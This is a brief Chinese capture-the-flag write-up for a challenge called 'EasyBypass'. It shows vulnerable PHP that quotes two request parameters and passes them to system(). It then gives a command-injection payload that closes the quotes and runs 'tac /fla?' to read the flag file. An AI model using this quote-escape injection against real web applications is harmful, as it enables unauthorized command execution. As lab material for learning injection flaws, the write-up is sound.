EasyBypass linux命令：tac /fla?;

源码：

$flag = "#flag in /flag";

$comm1 = '"' . $comm1 . '"';
$comm2 = '"' . $comm2 . '"';

$cmd = "file $comm1 $comm2";
system($cmd);
?>

payload：?comm1=index.php";tac /fla?;"&comm2

$cmd="file index.php";tac /fla?" " " ";

这里tac /fla?两边没有加引号

标签：comm1,comm2,cmd,EasyBypass,flag,tac,fla
来源： https://www.cnblogs.com/hackerone/p/16476138.html